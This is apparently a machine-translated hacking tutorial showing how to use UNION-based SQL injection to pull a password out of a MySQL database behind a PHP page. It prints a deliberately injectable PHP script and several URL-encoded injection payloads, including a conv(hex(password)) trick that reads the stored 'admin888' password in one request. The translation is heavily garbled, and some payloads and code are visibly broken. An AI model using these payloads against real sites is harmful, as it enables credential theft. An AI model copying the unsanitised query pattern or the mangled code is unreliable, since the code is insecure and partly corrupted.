Tips for Union queries

Author: toby57
I believe that we are not using joint queries in the injection process. It is true that union queries are very convenient, without the need to guess one character after another, which greatly improves the factory power. However, due to its condition requirements, they cannot be fully met in many cases, at that time, I had to look at the injection point, scream, and start to use the most primitive method with grief. Of course, we have no way to do this if the conditions are not allowed. However, sometimes we are so careless that the highly efficient joint query method is not used, this does not conform to "representing the most advanced productivity" in "three represents. One of the following situations is possible. ^_^ (I believe many of my friends already know it, but I didn't see it on the Internet. I propose it here and I will focus on it when I entertain myself)

Mysql> select * from test; + ------ + ---------- + | id | username | password | + ------ + ---------- + | 1 | admin | admin888 | + ------ + ---------- + 1 row in set (0.03 sec)
Mysql> select * from test; <br/> + ------ + ---------- + <br/> | id | username | password | <br/> + ------ + ---------- + <br/> | 1 | admin | admin888 | <br/> + ------ + ---------- + <br/> 1 row in set (0.03 sec)
Test. php:

<? $ Id = $ _ GET [id]; $ lnk = mysql_connect (localhost, root, root) or die (Not connected :. mysql_error (); mysql_select_db (test, $ lnk) or die (Can use foo :. mysql_error (); $ query = "SELECT count (*) FROM test where id = $ id"; $ result = mysql_query ($ query ); while ($ result_row = mysql_fetch_row ($ result) {if ($ result_row [0]) & is_numeric ($ result_row [0]) {echo $ result_row [0] ;}}?>
<? <Br/> $ id = $ _ GET [id]; <br/> $ lnk = mysql_connect (localhost, root, root) or die (Not connected :. mysql_error (); <br/> mysql_select_db (test, $ lnk) or die (Can use foo :. mysql_error (); <br/> $ query = "SELECT count (*) FROM test where id = $ id"; <br/> $ result = mysql_query ($ query ); <br/> while ($ result_row = mysql_fetch_row ($ result) <br/>{< br/> if ($ result_row [0]) & is_numeric ($ result_row [0]) {<br/> echo $ Result_row [0]; <br/>}< br/>?>
We all know that in a Union query, not only the numbers of the front and back columns must be equal, but also the types must be the same. In this injection point, the type of the return value of the previous query should be numeric. What should we do if we want to use the Combined Query to obtain the password of the text type?
In fact, we can first find out the password length:

Http://www.hacker.com/test.php? Id = 1% 20and % 201 = 2% 20 union % 20 select % 20 length (password) % 20 from % 20 test % 23

The returned result is 8. OK, then:

Http://www.hacker.com/test.php? Id = 1% 20and % 201 = 2% 20 union % 20 select % 20 ascii (mid (password,) % 20 from % 20 test

The returned result is the ASCII code value of the first digit of the password. Then, it is OK to check every bit.
However, we actually have a more convenient method. Hey, one query is enough.
We submit:

Http://www.hacker.com/test.php? Id = 1% 20and % 201 = 2% 20 union % 20 select % 20 conv (hex (password),) % 20 from % 20 test

7017854418938247224 is returned. Convert the hexadecimal value to 0x61646D696E383838, which is the hexadecimal value of "admin888. Haha, I don't want to talk about the principle anymore. I believe everyone is "the second is an egg.
If you do not use the conv function during the test, the type will not match.
OK! It's all done.